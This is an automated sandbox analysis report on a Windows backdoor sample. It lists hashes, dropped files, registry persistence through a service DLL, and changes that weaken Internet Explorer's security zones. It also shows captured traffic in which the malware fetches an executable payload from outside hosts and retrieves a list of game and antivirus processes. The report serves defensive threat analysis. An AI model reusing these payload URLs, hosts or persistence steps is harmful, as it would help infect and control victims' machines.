Backdoor.Win32.Farfli_8ed2beb05d

by malwarelabrobot on May 3rd, 2014 in Malware Descriptions.

Trojan.Win32.Chifrax.a (Kaspersky), Trojan.Generic.11192339 (B) (Emsisoft), Trojan.Generic.11192339 (AdAware), Backdoor.Win32.Farfli.FD, Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Backdoor, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 8ed2beb05d64cacfac8bea5c186fc7f7
SHA1: 7e2cba288e0d42f19de32be0498babbb026fe08d
SHA256: a4797149e63e0058e11c3017afbca6d3669dd0922fbdef475559eaf8acdbcf3b
SSDeep: 6144:BY KFYiFdqGENDowjO v8BQf vESzFJ2SpUsO/LUNErlsOUqqHdQ21R5W7LvSSvn:BYZFJFvajbevESBJ2Vz0EhsHp9QQRgS3
Size: 384512 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: Chip Digital GmbH
Created at: 2014-04-09 06:17:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Backdoor creates the following process(es):

WScript.exe:320
535.exe:2004
tasklist.exe:1868
tasklist.exe:1620
tasklist.exe:212
tasklist.exe:816
tasklist.exe:1996
%original file name%.exe:1848
wuauclt.exe:540
RarExel.exe:644
killwatcher.exe:512
ping.exe:1832
ping.exe:1996
ping.exe:1260
ping.exe:436
ping.exe:548
ping.exe:232
find.exe:1712
find.exe:1300
find.exe:1200
find.exe:1480
find.exe:240
find.exe:2004

The Backdoor injects its code into the following process(es):
No processes have been created.

File activity

The process 535.exe:2004 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%WinDir%\Temp\WinService.dll (131 bytes)

The process %original file name%.exe:1848 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%WinDir%\killwatcher.exe (103 bytes)
%WinDir%\nsink.txt (34 bytes)
%Program Files%\WinRAR\RarExel.exe (3073 bytes)
C:\Hook.dll (4 bytes)
%WinDir%\iiis.txt (2 bytes)

The Backdoor deletes the following file(s):

%WinDir%\killwatcher.exe (0 bytes)

The process wuauclt.exe:540 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)

The Backdoor deletes the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)

The process RarExel.exe:644 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\535.exe (94 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\535.exe (0 bytes)

The process killwatcher.exe:512 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\kw.cmd (365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kw.vbs (93 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KW.exe (800 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\__tmp_rar_sfx_access_check_340765 (0 bytes)

Registry activity

The process WScript.exe:320 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 BE 13 55 DD 4E 41 DE F9 C7 6F D7 04 57 52 5B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"kw.cmd" = "kw"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process 535.exe:2004 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 89 4E 7D A8 0D 04 AA A0 57 8A 38 66 9C DB BD"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"netsvcs" = "6to4, AppMgmt, AudioSrv, Browser, CryptSvc, DMServer, DHCP, ERSvc, EventSystem, FastUserSwitchingCompatibility, HidServ, Ias, Iprip, Irmon, LanmanServer, LanmanWorkstation, Messenger, Netman, Nla, Ntmssvc, NWCWorkstation, Nwsapagent, Rasauto, Rasman, Remoteaccess, Schedule, Seclogon, SENS, Sharedaccess, SRService, Tapisrv, Themes, TrkWks, W32Time, WZCSVC, Wmi, WmdmPmSp, winmgmt, wscsvc, xmlprov, napagent, hkmsvc, BITS, wuauserv, ShellHWDetection, helpsvc, WmdmPmSN, iCount"

[HKLM\System\CurrentControlSet\Services\iCount]
"Description" = "·þÎñÃèÊö"

[HKLM\System\CurrentControlSet\Services\iCount\Parameters]
"seRVicemAIN" = "ServiceMain"
"ServiceDll" = "%WinDir%\Temp\WinService.dll"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\iCount]
"Start" = "2"

The process tasklist.exe:1868 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 3E F0 3E FE 17 90 BD 98 A9 2B 90 B9 86 B0 46"

The process tasklist.exe:1620 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 8F 44 07 25 A4 5D 29 46 B3 4A B8 66 88 BE 72"

The process tasklist.exe:212 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 61 3A BC A0 14 F6 36 8A C6 B0 EE 12 20 4E 42"

The process tasklist.exe:816 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 0B 55 79 6B 6B 35 3D AC 4D C0 8A 47 79 BF CC"

The process tasklist.exe:1996 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 01 39 28 4D B9 F3 B6 9D F7 5A 8D DE 45 FC 91"

The process %original file name%.exe:1848 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\WinRAR]
"RarExel.exe" = "RarExel"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"killwatcher.exe" = "killwatcher"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 61 32 A0 A4 CD 15 E4 A7 79 4F E3 F5 F0 C8 F1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process RarExel.exe:644 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 2E 5C E2 EB 08 0C 03 E0 7B F0 86 55 25 5F D2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"535.exe" = "535"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process killwatcher.exe:512 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 B2 39 E4 EA FD 4A EB B6 1C D0 8E D1 AB 27 B9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\WinRAR SFX]
"C%%DOCUME~1­m%LOCALS~1%Temp" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process ping.exe:1832 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 05 DE 92 CC 67 42 E1 DA 7B D2 CD 3E 0A D6 F9"

The process ping.exe:1996 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 14 59 FD 1B 81 94 8D A5 F5 4D F1 F8 B3 69 C1"

The process ping.exe:1260 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 97 4A 5A 78 45 4E 61 0B 8D 62 05 A8 B0 7C 1D"

The process ping.exe:436 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 04 EB FE DE D9 69 2E B5 83 21 33 1E 9D 1A EF"

The process ping.exe:548 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 E5 24 6B 74 48 FE 5B 23 B5 49 ED 39 BA 55 03"

The process ping.exe:232 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC C4 72 EC F6 73 75 83 5A 1C DA 81 3A 9B AB 9D"

The process find.exe:1712 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 1B AB 4D 3B 50 0B 03 49 51 29 D4 C8 86 BE B0"

The process find.exe:1300 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE B0 B4 DF C2 FC 86 B7 2A B5 EE 86 61 1C 3A F7"

The process find.exe:1200 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 84 2E 96 2A 75 9C 97 29 EB 7F 88 0E B0 CC 57"

The process find.exe:1480 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 0C BC 5A 05 DA 7B E7 1A 7F CB B3 D3 47 C9 B6"

The process find.exe:240 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 09 0F 91 93 98 CB 44 69 23 D9 5E EC 86 FA B5"

The process find.exe:2004 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 96 9B 05 BB C1 89 F7 88 48 9A A4 3C 33 DF D2"

Dropped PE files

MD5 File path
f8bb7b18c9c70952f0c26419e975b0d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\KW.exe
4659f476b80e067bceeaa8e821c3fab8 c:\Hook.dll
d56cfd9db6ca6231dba149f1282e609b c:\Program Files\WinRAR\RarExel.exe
81cc1f7dbdf8405f9deaf0bb219de6ee c:\WINDOWS\Temp\WinService.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 647168 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 651264 380928 378880 5.49485 88857984284153a263cbc776fc81463c
.rsrc 1032192 8192 4608 2.20964 bb84a6b99dc203a8ced12ad12f21d696

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://daxie.dbankcloud.com/adsafe2.exe 122.11.38.177
hxxp://14.17.110.138/dl/daxie/adsafe2.exe
hxxp://597play.com/stopser.txt 223.26.61.181
hxxp://597play.com/lookjc.txt 223.26.61.181
hxxp://www.dnf8090.com/yc.jpg 111.73.45.234


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /yc.jpg HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: VVV.dnf8090.com
Pragma: no-cache


HTTP/1.1 200 OK
Content-Length: 1094
Content-Type: image/jpeg
Last-Modified: Sun, 20 Apr 2014 08:11:15 GMT
Accept-Ranges: bytes
ETag: "14c9e819705ccf1:589"
Server: Microsoft-IIS/6.0
Date: Fri, 02 May 2014 05:31:23 GMT
Connection: close
JLDSCEBLDRJFBFHQJABGJPIPELGEGWAPCQETDICHJGACCLDWHNIQJIBQBTJPAADYAMEODF
DKJNCNEFHGIQAGAFHAEHBGDIFYAPBSIICBINCMAFIFEFJDAACOFRJCHBBGBMAZHFIOJTGK
FIBTIQEWDIFAIZIUDSJCFKHCAIJKEWHVBGAEGRAFIZBKFWIXBNGVIZBFFQJLBECHFMAFJG
FYHYDJFJCOEUHLIEHYFFDXEBCGDUDIIDHREIJADHIFGZJEJCJJIBIEGJAFDWABCOBMFACC
IYIKIPDECJDNGGALECHXAHCCHFIOFSFMBRGJAZIBIYARHXFMENHOJSBLJSJFFADXFTFKFQ
GBGKAGGQECFPHFGIBXDCIPCTJNEVHPJRHBBSHJCGEKDXAZDXDDDNJABKGBAAGNJKFVARDD
IQALDOESCRBJGQAOIYCTHEFWAGIVFRFKCKECAUASASFPCXCGGYBKEOAXADIGEGJNENACCH
JQBZBBETHKCIEBBKDKJCGPHMCZJUJKAVDJAJENGGANFPCBDRJNBBJHGQBSASDDIGEUCKHE
CAHKDFIZILDWGHHCGJHOCIAXJVCEFHBGFUGBAKILIEFPBOCYFWGLFIARDWEOASCVAWHLDR
BABOFVDRBMESBECKJPBCBABTGIGUHGHYHHFJCOCIGODKDLAQFPBMCRCMCVAOFACWHPHIJB
JEFQISHCBEDOFCCNIIGGILJAIMHLEEGPGCCPGMFJIMDSBMAOAEFNJOJFHODMAYASDXFFIL
GDIIHPGJBDAFFAGPJIBZAKDNCOBFAYFUAIHVDKITIXIBARHKDJCSHNIIBEHVIKAYEEHQCD
CYFBHXCZEABFBAFNDHEHERDKHJGWAOCGEUDVIHBUDFAXGACNDLFBDIJUJJHCFOFVDLIWEK
HRJAFSFGCJHXGTIDBOFDHIHHCCDRAVAHHKAPASCWCABHGKIJHOAUAJFVHMENBWHJCLHUAD
JRDEDTGIIQELENDMFLGYJGGKCUAIFPEMCJDOGFHKIIFGJEHTDVEGDSDGIABDBPIPFZAWDE
GIBFDQAAEEAMIMBBHWJNFYAAGUFBACIWDFJRETDCADFC..



GET /dl/daxie/adsafe2.exe HTTP/1.1
Host: 14.17.110.138
Accept: */*
Referer: hXXp://14.17.110.138/dl/daxie
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 200 OK
Server: nginx/1.1.13
Date: Fri, 02 May 2014 05:32:37 GMT
Content-Length: 494080
Connection: close
Content-Type: application/octet-stream
Last-Modified: Sat, 03 May 2014 05:32:37 GMT
Cache-Control: max-age=86400
Expires: Sat, 03 May 2014 05:32:37 GMT
Content-Disposition: attachment; filename="adsafe2.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......;]8..<VT.
<VT.<VT. ZT|<VT. XTT<VT)#ETS<VT.#ETj<VT.<WT'>V
TI.\T.<VTI.]T$<VT.#]T5<VT.<VT_<VT.:PT~<VTRich.<VT
................PE..L....g`S.................p... [email protected]........
@.....................................................................
......................................................................
......................................................UPX0.....@......
........................UPX1.....p...P...f..................@....rsrc.
... ....... ...j..............@.......................................
......................................................................
......................................................................
......................................................................
......................................................................
.......................................................3.02.UPX!.....G
......T....b......&".&....3.....u.........t...A..t;.....u.......~.....
3.........t......A.L&..t."..p..t........A. ......U........@... ..<$
Q.E..d.u......Q.....".Y.*.....Iu..u.&4.......n..X..$W.UV....2.....H<
;}......X..].^j.Ku........h...m..}........C.hM.....x.BP.i-  .......j.=
.....wF...J..e.P..6...1..P....]..t\H;..S.....V.....h.B......h..|...G@.
;.rvr.....EaD......h.WQf.....i'..k.....o.w.....\h...J..u..Cv....R.Ph..
PE..........\..L.0...G..?...L......`@....1...2.u...N[.!...........
<<< skipped >>>


GET /stopser.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 597play.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 02 May 2014 05:32:41 GMT
Server: Apache/2
Last-Modified: Wed, 30 Apr 2014 02:27:20 GMT
ETag: "1835d7-6-4f83949b5b087"
Accept-Ranges: bytes
Content-Length: 6
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
iCount....


GET /lookjc.txt HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 597play.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 02 May 2014 05:32:41 GMT
Server: Apache/2
Last-Modified: Wed, 30 Apr 2014 04:28:43 GMT
ETag: "1835d8-a6-4f83afbd874b6"
Accept-Ranges: bytes
Content-Length: 166
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
launcher.exe..QQlogin.exe..QQ.....exe..DNFchina.exe..World of Warcraft
 Launcher.exe..my.exe..xy2.exe..360Safe.exe..360sd.exe..crossfire.exe.
.LOLBox.exe..LolClient.exeHTTP/1.1 200 OK..Date: Fri, 02 May 2014 05:3
2:41 GMT..Server: Apache/2..Last-Modified: Wed, 30 Apr 2014 04:28:43 G
MT..ETag: "1835d8-a6-4f83afbd874b6"..Accept-Ranges: bytes..Content-Len
gth: 166..Vary: Accept-Encoding,User-Agent..Content-Type: text/plain..
launcher.exe..QQlogin.exe..QQ.....exe..DNFchina.exe..World of Warcraft
 Launcher.exe..my.exe..xy2.exe..360Safe.exe..360sd.exe..crossfire.exe.
.LOLBox.exe..LolClient.exe..



GET /adsafe2.exe HTTP/1.1
Host: daxie.dbankcloud.com
Accept: */*
Referer: hXXp://daxie.dbankcloud.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.6
Date: Fri, 02 May 2014 05:32:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://14.17.110.138/dl/daxie/adsafe2.exe
0..
svchost.exe_1060:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
user32.dll
OLEACC.DLL
EnumChildWindows
WebBrowser
HTTP/1.1 200 OK
cmd /c net stop
http://597play.com/stopser.txt
http://597play.com/lookjc.txt
c:\windows\nsink.txt
http://16945.5258.net
http://*hao123.com*
http://*baidu.com*
{1234567456712415}
{987-654-321-cba}
?456789:;<=
!"#$%&'()* ,-./0123
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
ole32.dll
__MSVCRT_HEAP_SELECT
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
RASAPI32.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
EnumWindows
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
COMCTL32.dll
oledlg.dll
WSOCK32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
